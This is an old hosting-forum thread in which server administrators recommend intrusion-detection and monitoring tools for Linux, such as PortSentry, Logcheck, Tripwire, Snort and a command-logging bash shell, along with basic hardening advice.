Just wondering what people do/use to monitor for illegal activity like users trying to hack/crack to gain root access to the server. Anyone actually monitor or you just wait till it's happened then fix it?

JFTR I have a server and within the last 2 weeks it's been hit twice. Mostly likely by the same person(s) as they same useraccounts have been created. It's quite agrivating as I thought I had this system locked up pretty darn tight. It would be nice to have some sort of monitoring system to warn me when someones on the system messing around...

Well there are a lot of security apps, tripwire is one of them, which you can find on http://freshmeat.net/

Hi everyone,

Please correct me if I'm wrong, but my knowledge of Tripwire is that it only notifies you *after* a compromise was made. IMHO, its not very effective against detering intruders but more of letting you know when your server was hacked into?

I'm also looking for a program which (hopefully) features intelligent detection and subsequent banning of users suspected of illegal activites against the server.

Anybody care to suggest whether such programs exist?

Unfortunately, most of the time, there *isn't* a way to catch a user before they compromise a system.

Let's face it, it's not like these people are typing "give me root access" at the prompt. Most exploits these days involve buffer overflows or other bad input checking by software running with privileges. You can't effectively monitor for intrusions via these methods, at least before it happens. What you can do is make sure that you've plugged up all known holes in your system.

Further complicating things is that anyone with root access can cover their tracks quite effectively. Remember, all data on the local system can be tampered with when a box is compromised, including monitoring and reporting systems.

There are a few things you can do in the way of monitoring, of course. You can filter and watch logs for repeated password failures, dumb users trying to su to root, etc. But ultimately, you will probably not know somebody has compromised your box until they have. That's where it's a must to have solid recovery procedures, and competent staff that can identify the exploit used and plug it up.

I get a whole slew of anonymous ftp logins (anonymous ftp is not enabled on any domain). Every IP address on the machine is tried. I think someone mentioned that this is pretty common.

I see it all the time. Easy fix: turn off anonymous logins, or better yet, FTP if you don't need it. :)

Yep, these are attempts. I don't turn on anon. ftp.

Red Hat is terrible about security.

The other daym we put up a new box, with no services running on it and all of a sudden one of the techs noticed it was generating like 4.5mbs of traffic, and nothing even on that box, it was crazy, im not sure what they found out the deal was.

Red Hat 6.2 and security freaks... go to http://www.openna.com/books/registration.htm and download a copy of the pdf of their book. It explains everything to do to secure a red hat system, including how to monitor logs, patch systems, monitor ports, everything.

It is very well written,... and IT'S FREE! :) (I love linux)

I use port sentry, works very well and it's free.

Here you go, http://www.psionic.com/abacus/portsentry/

I hope that this helps.

In terms of monitoring users already on the servers (those that have telnet access), we use a modified version of bash, that logs all their commands directly to a file, which is then grepped once a day for various suspect words and anything interesting is mailed to the admins, we dont publicise the fact too much (not that we hide it either), so it hasnt put people off trying, but its certainly helped us catch several people trying various exploits, trying to DoS from our servers etc.

If anyone wants a copy, I can probably dig it out.

Regards,

Tony Lucas

I would love to have a copy. Please contact me about it.

Please, me too :) that sounds like a terrific add-on

Could I have a copy to please?

Its at http://www.virtualhoster.co.uk/bash+xcal.tar.gz for those that are interested.

Logs to /var/log/.bashlogs.

Ill leave it up to you guys to write the cron scripts for it, as ours are integrated into other scripts.

Regards,

Tony Lucas

Thanx :)

We've formed a virtual crimewatch community - all our sites participate...we put stickers on our servers letting everyone know it is a crimewatch server...so I seriously doubt hackers will come snooping around.
Oh yeah, and we use nessus

Originally posted by Toons
Its at http://www.virtualhoster.co.uk/bash+xcal.tar.gz for those that are interested.

Logs to /var/log/.bashlogs.

Ill leave it up to you guys to write the cron scripts for it, as ours are integrated into other scripts.

Regards,

Tony Lucas


Can you put it back up again for me please so I can download it?
Thank you.

Please be aware this thread is about 10 months old. I would suggest emailing Toons first. I'll leave it open since it might benefit other people...

I know but maybe someone else has it for me.

well
i dont know if what i say will be any help but
what i usually do is run iplog
but see my situation is different, becuase my server is a private box. My friend and I are the only ones that login, via sssh, the rest are denied with tcp wrappers. telnet is disabled, and only a couple people have ftp logins (ONLY)

So what i do is install iplog and run tail -f /var/log/iplog.log and monitor my server that way.........
If i see port scans, ftp attempts, i know what they are trying to do. Besides, i know how, i wont call them hackers, but "kiddies" think.

another thing you can do i suppose, is install ttysnoop, and from there, if anyone has a shell, you can watch their screen thru ttysnoop.. But i dont suggest running telnet, since there are remote root telnet exploits out there :)

Originally posted by cbaker17
Red Hat is terrible about security.

The other daym we put up a new box, with no services running on it and all of a sudden one of the techs noticed it was generating like 4.5mbs of traffic, and nothing even on that box, it was crazy, im not sure what they found out the deal was.

if there are no services running
i highly doubt it was REDHAT
????????????????????????????

OK... for a Linux box, you're going to want the following standard things installed, config'd and running:

Portsentry: Already mentioned, this puppy monitors certain ports to see if someone is 'portscanning' your system. This typically happens in the 'front' or 'beginning' part of an attack. Portsentry can be configured to just log the attack, or actually block the offending host. Available at http://www.psionic.com/

Logcheck: A simple utility -- this runs at regular intervals, scans system logs, and emails suspicious activity to the admin. Good for catching an attack in progress. Also available at http://www.psionic.com/

Tripwire: Yes, you're correct. This only catches things after they happen. But as the folks at project 'Honey net' ( http://project.honeynet.org/ ) will tell you, it's good to have documentation to analyze after an attack. This can help you find weaknesses, and can tell you about files that have been affected.

For a truly secure system, or a firewall:
Harden your box/network using ipchains: There's no substitute for hardening your network by closing off un-needed ports or services. I'd also recommend turning off ICMP echo-replies.

Use Snort: The folks at Snort are a fun bunch. The tool they've built uses 'packet signatures' to detect attacks from a mile away. Check it out at http://www.snort.org

Use NAT/Reverse proxying using port-forwarding This makes it easier to lock down your entire network from one location. This might create a speed bottleneck, though -- so be sure to do a risk analysis before diving into this.

Check out HostSentry: This might be what you're looking for. Apparently, this will look for 'bad people trying to log in' by evaluating the normal pattern of logins that occur on a system. Also available at http://www.psionic.com/


Questions? Comments? Need advice for NT/2000? Drop me a line via email or PM.

-Dan

One thing I wanted to point out is the potential conflict between PortSentry and running a firewall (on the same box). I don't know if PortSentry does this by default (I don't personally use it), but in one configuration I've seen, the installation set up a cron to flush your 'ipchains' rules every hour.

The logic was that it can't do its job if the ports are blocked, but there are cases where you might want to monitor some ports, and block other specific ports (or hosts or protocols). It took a bit of troubleshooting to figure out why the firewall kept disappearing.

I don't recall if it also flushed the 'forward' chain, or if it affects 'iptables' or not, but it's something to keep in mind if you have problems similar to this.

I've never seen that behavior in Portsentry.

It blocks hosts permanently both through hosts.deny and ipchains.

If the ports are blocked, the job of securing the box (by monitoring portscans and taking action) is already done. Portsentry would be overkill.

Dan